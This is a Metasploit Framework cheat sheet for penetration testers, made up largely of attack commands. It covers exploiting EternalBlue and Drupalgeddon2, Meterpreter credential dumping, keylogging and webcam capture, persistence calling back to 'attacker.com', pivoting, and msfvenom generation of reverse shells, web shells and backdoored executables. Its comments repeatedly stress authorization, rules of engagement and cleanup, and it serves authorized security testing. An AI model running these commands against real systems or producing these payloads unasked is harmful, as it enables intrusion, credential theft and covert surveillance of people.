Metasploit Framework
Metasploit is an open-source penetration testing framework (maintained by Rapid7) that packages exploits, payloads, scanners and post-exploitation modules behind one console. Almost every command on this page performs an attack rather than an audit: use it only against systems you are explicitly authorized to test, and record what you run so artifacts can be cleaned up afterwards.
Installation
# Debian/Ubuntu
# NOTE: stock Debian/Ubuntu repositories do not ship metasploit-framework;
# this package name works on Kali or after adding Rapid7's repository
# (their msfinstall script does that for you).
sudo apt install metasploit-framework
# Update
# On apt-managed installs update through apt instead; msfupdate targets the
# Rapid7-installer / git-checkout layouts and its behaviour varies by install.
sudo msfupdate
# Kali Linux (pre-installed)
# Start the console. Run "msfdb init" once (see Database) so searches,
# hosts and services are backed by the database.
msfconsole
Basic Commands
Starting Metasploit
Navigation
# Search
search <keyword>
# Filter by type/platform; other useful keys: cve:, name:, author:, rank:
search type:exploit platform:windows
# Use module
use exploit/windows/smb/ms17_010_eternalblue
# Show options
# "info" prints rank, side effects and reliability notes before you run it
show options
show advanced
show payloads
# Set options
# RHOSTS accepts a single host, a CIDR range or file:/path/to/hosts
set RHOSTS 192.168.1.1
set RPORT 445
# LHOST/LPORT are where a reverse payload calls back: LHOST must be the
# attacker's address as seen from the target (not 127.0.0.1 or a NAT-internal IP)
set LHOST 192.168.1.100
set LPORT 4444
# Show targets
show targets
set TARGET 0
# Check if target is vulnerable
# Not every module implements check; when it does it is safer than exploiting
# but still sends traffic the target may log or flag.
check
# Run exploit
# "exploit" and "run" are aliases; "exploit -j" backgrounds it as a job,
# "exploit -z" does not auto-interact with the new session.
exploit
run
Scenarios
# Quick SMB version scan across a subnet
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
# THREADS defaults to 1; raise it for large ranges
run
# Check and exploit MS17-010
# EternalBlue corrupts kernel pool memory and can crash (BSOD) the target.
# Run check first and get the asset owner's sign-off for the crash risk.
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
check
# The payload architecture must match the target kernel (x64 here)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit
# Exploit a web app and catch a shell
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.1.20
# TARGETURI is the path Drupal is served from ("/" when at the web root)
set TARGETURI /drupal
set LHOST 192.168.1.100
run
# Suggest local privilege escalation modules
# Needs an existing session id ("sessions -l"); results are heuristic —
# a listed module is a candidate, not a guarantee.
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# Pivot with autoroute and SOCKS proxy
use post/multi/manage/autoroute
set SESSION 1
run
# SRVHOST defaults to 0.0.0.0, so anyone who can reach the attacking host
# can use the pivot; consider "set SRVHOST 127.0.0.1" unless remote access is
# required. Then point proxychains at 127.0.0.1:1080.
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
Modules
Exploit Modules
# Search exploits
search type:exploit
# Popular exploits
# Pick by the target's actual software and version; "info <module>" shows
# rank, side effects and reliability notes before you run it.
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/http/rejetto_hfs_exec
# multi/handler is not an exploit: it only listens for payloads you deliver
# some other way (see the MSFVenom and Multi/Handler sections)
use exploit/multi/handler
use exploit/unix/webapp/drupal_drupalgeddon2
Auxiliary Modules
# Port scanning
# Slower than nmap, but it works through Metasploit routes when pivoting;
# set PORTS and THREADS
use auxiliary/scanner/portscan/tcp
# SMB scanning
use auxiliary/scanner/smb/smb_version
# FTP scanning
use auxiliary/scanner/ftp/ftp_version
# HTTP scanning
use auxiliary/scanner/http/http_version
# Brute force
# Online password guessing is noisy and can lock accounts out: agree the
# lockout policy first, use USER_FILE/PASS_FILE (or USERPASS_FILE), and set
# STOP_ON_SUCCESS true and a low BRUTEFORCE_SPEED. Successful logins open
# sessions automatically.
use auxiliary/scanner/ssh/ssh_login
Post-Exploitation Modules
# Gather credentials
# All post modules need a live session ("set SESSION <id>"); most of these
# need SYSTEM or local-admin rights on the host.
use post/windows/gather/credentials/credential_collector
# Hashdump
# Dumps SAM hashes (needs SYSTEM). Treat collected hashes as client data:
# store them encrypted and never reproduce them in full in the report.
use post/windows/gather/hashdump
# Enum system
use post/windows/gather/enum_system
# Screenshot
# screen_spy and keylog_recorder capture user activity, not just system
# state — confirm the rules of engagement explicitly permit monitoring.
use post/windows/gather/screen_spy
# Keylogger
use post/windows/capture/keylog_recorder
Payloads
List Payloads
# Show available payloads
# Lists only payloads compatible with the current module, target and arch
show payloads
# Set payload
# Naming: "meterpreter/reverse_tcp" (slash) is staged — a small stager
# downloads the rest; "meterpreter_reverse_tcp" (underscore) is stageless.
# The architecture (x86 vs x64) must match the exploited process.
set PAYLOAD windows/meterpreter/reverse_tcp
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Common Payloads
# Windows
# The staged reverse_tcp stager downloads its stage in the clear over TCP;
# reverse_https wraps the channel in TLS and usually passes web proxies and
# egress filtering better — prefer it outside a lab.
windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_https
windows/shell/reverse_tcp
# Use the x64 variant when the exploited process is 64-bit
windows/x64/meterpreter/reverse_tcp
# Linux
linux/x86/meterpreter/reverse_tcp
linux/x64/meterpreter/reverse_tcp
linux/x86/shell/reverse_tcp
# Multi-platform
# Plain reverse shell with no Meterpreter features; useful when the target
# platform or shell is unknown
generic/shell_reverse_tcp
Meterpreter
Basic Commands
# System information
sysinfo
getuid
# Process information
ps
getpid
# File system
pwd
ls
cd
cat
# download/upload take a remote path and an optional local path. Downloaded
# files are engagement evidence — keep them in the encrypted loot store.
download
upload
# Recursive search can take a long time on large disks; narrow with -d <dir>
search -f *.txt
# Networking
# Inside Meterpreter these show/modify the TARGET's interfaces and routes
ipconfig
route
portfwd
# Execute commands
# -i interacts with the new process; "shell" drops straight into cmd/sh
# (type "exit" to come back, or Ctrl-Z / "background" to background the session)
execute -f cmd.exe -i
shell
Privilege Escalation
# Check privileges
getprivs
# Attempt auto-escalation
# Tries named-pipe impersonation and token duplication; it needs an already
# elevated (local admin) session — from a standard user, or an admin user
# still under UAC, it fails: bypass UAC or run a local exploit first.
getsystem
# Bypass UAC
# Background the session first. Several bypassuac_* modules exist
# ("search bypassuac"); choose one for the target's Windows build, and the
# session user must already be a member of the Administrators group.
background
use exploit/windows/local/bypassuac
set SESSION 1
exploit
Post-Exploitation
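# Dump hashes
# hashdump needs SYSTEM. kiwi (Mimikatz) needs SYSTEM and a Meterpreter whose
# architecture matches the OS — migrate into a 64-bit process on x64 first.
hashdump
load kiwi
creds_all
# Screenshot
screenshot
# Webcam
# Webcam and keystroke capture record people, not just systems; do not use
# them unless the rules of engagement explicitly allow it.
webcam_list
webcam_snap
# Keylogger
keyscan_start
keyscan_dump
keyscan_stop
# Migrate process
# Pick a stable, long-lived process of the same architecture, owned by the
# same user (or SYSTEM when you are SYSTEM); migrating into a process with
# higher privileges than the session fails.
ps
migrate <PID>
# Persistence
# The legacy "run persistence" Meterpreter script is deprecated (and may be
# absent in current releases); use the local exploit module instead. It drops
# a script/executable plus a Run key (STARTUP USER) or a service (STARTUP
# SYSTEM / SERVICE) on the target and prints a cleanup resource script —
# keep it, and record every artifact so it is removed at the end of the
# engagement. Only persist on hosts the client has agreed to.
background
use exploit/windows/local/persistence
set SESSION 1
set STARTUP USER
set DELAY 60
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker.com
set LPORT 4444
exploit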
Pivoting
# Add route
# Run at the msf prompt: sends module traffic for the subnet through the
# session ("route print" lists routes, "route flush" clears them). Inside
# Meterpreter, "route" manages the target's own routing table instead.
route add 10.10.10.0 255.255.255.0 <SESSION_ID>
# Port forwarding
# Attacker-local port 8080 -> 10.10.10.10:80 through the session
# ("portfwd list" / "portfwd delete" to manage)
portfwd add -l 8080 -p 80 -r 10.10.10.10
# Autoroute
# Discovers the session host's subnets and adds the routes for you;
# "run" and "exploit" are equivalent here
use post/multi/manage/autoroute
set SESSION 1
exploit
# SOCKS proxy
# Then point proxychains at 127.0.0.1:1080. SOCKS 4a carries no UDP and no
# authentication; use VERSION 5 for tools that need them. SRVHOST defaults
# to 0.0.0.0 (exposed on every interface) — consider "set SRVHOST 127.0.0.1".
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 4a
exploit
MSFVenom
Generate Payloads
# List formats
# Also: --list payloads|encoders|platforms|archs, and
# "-p <payload> --list-options" for the chosen payload's options
msfvenom --list formats
# Windows executable
# LHOST/LPORT must match the multi/handler listener. reverse_tcp is
# unencrypted on the wire — prefer reverse_https for anything that leaves a
# lab network. Generated binaries are live backdoors: track and delete them.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
# Linux executable
# Payload arch (x86/x64) must match the target; chmod +x after upload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
# PHP web shell
# Deployed web shells are reachable by anyone who finds the URL — remove
# them as soon as the test step is done
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
# JSP web shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.jsp
# WAR file
# Deploy e.g. via Tomcat manager; the JSP inside gets a random name —
# list it with "unzip -l shell.war" and request /shell/<name>.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.py
# PowerShell
# Other PowerShell formats: psh-cmd (one-liner), psh-net, psh-reflection
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o shell.ps1
Encoders
# List encoders
msfvenom --list encoders
# Encode payload
# Encoders exist to avoid bad characters (-b '\x00'), not to evade AV:
# shikata_ga_nai is x86-only and heavily signatured. x64 payloads need an
# x64 encoder (e.g. x64/xor_dynamic); msfvenom errors out on a mismatch.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -f exe -o encoded.exe
# Multiple iterations
# Each iteration grows the payload and can break it; test every build
# against your own handler before using it
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe
Templates
# Inject payload into template
# Template arch/platform must match the payload (x86 template for an x86
# payload). Without -k the result runs only the payload, not the original
# program.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x template.exe -f exe -o backdoored.exe
# Keep template behavior
# -k starts the payload in a new thread and then continues the template's
# original entry point; it does not work for every binary (packed, .NET,
# unusual section layouts) — verify the result in a sandbox first
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x template.exe -k -f exe -o backdoored.exe
Multi/Handler
# Set up listener
# PAYLOAD, LHOST and LPORT must match what msfvenom generated.
# "set ExitOnSession false" keeps the handler open for further callbacks.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit -j # Run as job
# List jobs
jobs -l
# Kill job
jobs -k <ID>
# Session management
sessions -l # List sessions
sessions -i <ID> # Interact with session
# -K drops every session on every host at once; "sessions -k <ID>" for one
sessions -K # Kill all sessions
Database
# Initialize database
# Creates and starts the PostgreSQL instance and the msf database; run once,
# as the user who will run msfconsole. The database accumulates hosts,
# credentials and loot — protect it and wipe it like any other client data.
msfdb init
# Check status
msfdb status
# Connect to database
# Usually automatic after msfdb init; "db_status" inside msfconsole confirms
db_connect
# Workspace management
# One workspace per engagement keeps client data separated
workspace
workspace -a pentest
workspace pentest
# Import scan results
# Accepts Nmap XML (-oX) and several scanner formats; run db_import with no
# arguments to see the supported list
db_import scan.xml
# Hosts
hosts
hosts -a 192.168.1.1
# Services
services
services -p 445
Resource Scripts
# Create resource script
# A resource script is a plain list of msfconsole commands ("#" lines are
# comments). Keep its LHOST/LPORT in sync with the payloads you generate.
echo "use exploit/multi/handler" > handler.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.100" >> handler.rc
echo "set LPORT 4444" >> handler.rc
echo "exploit -j" >> handler.rc
# Run resource script
# -r runs the script at startup; add -q to skip the banner
msfconsole -r handler.rc
# From msfconsole
resource handler.rc